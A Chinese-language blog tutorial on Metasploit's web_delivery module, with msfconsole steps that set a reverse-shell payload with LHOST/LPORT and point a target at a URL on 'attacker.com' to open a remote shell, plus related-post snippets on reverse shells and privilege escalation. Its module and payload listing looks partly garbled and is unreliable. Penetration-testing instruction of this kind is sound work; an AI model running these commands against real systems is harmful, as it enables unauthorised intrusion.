exploit/multi/script/web_delivery 使用案例

于 2024-11-01 09:57:44 发布
阅读量569 收藏 2
点赞数 6
文章标签: 前端 网络 网络安全 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483815/article/details/143424456
版权

exploit/multi/script/web_delivery 是一个在 Metasploit Framework(MSF)中的一个模块,它主要用于远程执行代码,通过Web服务器向受害者的浏览器发送恶意脚本。这个模块通常用于渗透测试和攻击模拟,以验证目标系统的安全性。

模块列表

exploit/multi/script/web_delivery 模块本身是一个通用模块,它支持多种脚本语言的攻击载荷。以下是一些常见的脚本语言模块:

  1. Python:

    • exploit/multi/script/web_delivery/payload generic/shell_bind_tcp
    • exploit/multi/script/web_delivery/payload generic/shell_reverse_tcp

  2. PHP:

    • exploit/multi/script/web_delivery/payload generic/shell_bind_tcp
    • exploit/multi/script/web_delivery/payload generic/shell_reverse_tcp

  3. JavaScript:

    • exploit/multi/script/web_delivery/payload generic/shell_bind_tcp
    • exploit/multi/script/web_delivery/payload generic/shell_reverse_tcp

  4. Ruby:

    • exploit/multi/script/web_delivery/payload generic/shell_bind_tcp
    • exploit/multi/script/web_delivery/payload generic/shell_reverse_tcp

使用案例

以下是一个使用 exploit/multi/script/web_delivery 模块的示例,假设我们要通过Python脚本攻击一个目标系统,并建立一个反向TCP连接。

步骤 1: 启动 Metasploit 控制台
msfconsole
步骤 2: 选择并配置模块
use exploit/multi/script/web_delivery
set payload python/shell_reverse_tcp
set LHOST 192.168.1.100  # 攻击者的IP地址
set LPORT 4444          # 攻击者监听的端口
set TargetURI /         # 目标Web服务器的URI
步骤 3: 运行模块
exploit
步骤 4: 在目标系统上执行生成的URL

假设生成的URL是 http://attacker.com/script.py,你需要在目标系统的浏览器中访问这个URL。这将触发Python脚本的执行,并建立一个反向TCP连接到攻击者的IP地址和端口。

注意事项

  1. 合法性: 确保你只在授权的环境中进行测试,不要在未经授权的系统上进行攻击。
  2. 安全性: 使用Metasploit时要注意保护你的系统和网络,避免被恶意利用。
  3. 更新: 定期更新Metasploit Framework以获取最新的漏洞利用模块和安全修复。

通过这种方式,你可以利用 exploit/multi/script/web_delivery 模块进行各种脚本语言的攻击载荷传递,从而实现对目标系统的远程控制。

MSF里侦听模块使用教程 exploit/multi/handler
qq_45249394的博客
11-25 1万+
标题关于MSF侦听模块的第一次使用 侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7的查不到,可能不更新的原因吧。如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版和专业版,本人亲测免费版过不了wind...
网络安全】 MSF提权
最新发布
一直被模仿,从未被超越
03-15 1276
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行提权时如果报如下,表示没有拿到系统权限。5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块
msf中exploitweb_delivery模块
weixin_30300523的博客
03-11 321
背景:目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息 解决思路:让目标设备从远端服务器加载webshell代码至内存执行 错误尝试:远端服务器开启web服务,让目标设备来调取。(错误点:默认情况下目标设备来调取的时候其实是将webshell在远端服务器执行,并不是将文件加载至自己内存执行) ...
metasploit之webdelivery
Yale的博客
01-31 1315
介绍下webdelivery模块 先是启动metasploit 接下来选择我们使用模块 Show options看看我们需要设置哪些参数 我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看 2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,...
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 764
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
MSF:web_delivery模块使用测试(Windows)
beefreesky的博客
12-29 398
Windows环境下,MSF web_delivery模块使用测试
MSF:web_delivery模块使用测试(Linux)
beefreesky的博客
12-29 297
linux环境下,MSF web_delivery模块使用测试。
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1142
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
weblogic反序列化
Finlinlts的博客
08-30 3562
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。
使用Meterpreter从反弹shell 到提权
梳碧湖的砍柴人
01-08 1648
实验环境 攻击机:Kali Dabian 9 x 64位 IP:192.168.237.141 目标机:win 7 x64位 IP:192.168.237.141 目的:熟悉反弹shel流程, 熟悉Kali Meterpreter 操作 实验步骤 这里首先要知道自己得IP,WIN7 是ipconfig Kali 是ifconfig 然后在Kali生成一个木马文件 这里给大家一个网站,这里面有各个环境生成各种文件得命令 添加链接描述 网上也有很多 自己可以去看下
DMZ下使用web_delivery 介绍
每天多一分钟学习,生命就多一份精彩
06-08 1378
From : http://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html?utm_source=tuicool&utm_medium=referral 之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的
(记录向)使用MSF的web_delivery模块上线
daxi0ng的博客
11-30 1528
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
Msf - web_delivery
Nixawk
02-22 1914
Python Payload Modemsf exploit(web_delivery) > show options Module options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- --------
一条命令上线MSF(Metasploit)-web_delivery模块
10-31 2925
一条命令上线MSF(Metasploit)-web_delivery模块
msf web_delivery模块攻击
dichengpai8268的博客
05-03 461
目标机:win7 ip:192.168.31.136 攻击机:kai liunx ip:192.168.31.54 一.使用web_delivery模块的regsvr32_applocker_bypass_server 1.打开神器metasploit,终端输入msfconsole 2.搜索we...
msf_web_delivery模块漏洞(win7以上注册表)
芥子
01-25 1107
目标机:win10   ip:192.168.1.8 攻击机:kali Linux    ip:192.168.1.63 一:直接打开metasploit,也可在终端直接输入msfconsole msf的用法:  查找web_delivery模块: search web_delivery 使用web_delivery模块:use exploit/windows/misc/
使用Metasploit web_delivery 反弹shell
大方子
02-07 5553
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
渗透测试-window反弹shell
lza20001103的博客
05-11 5234
window反弹shell
内网渗透之Linux反弹shell(三)
墨鱼菜鸡
09-10 252
目录 Linux反弹shell(三) 环境 05.3Python 06.1PHP 06.2PHP 07Ruby 08.1Telnet 08.2Telnet 09OpenSSL Linux反弹shell(三) 环境 kali 192.168.0.100 ubuntu ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值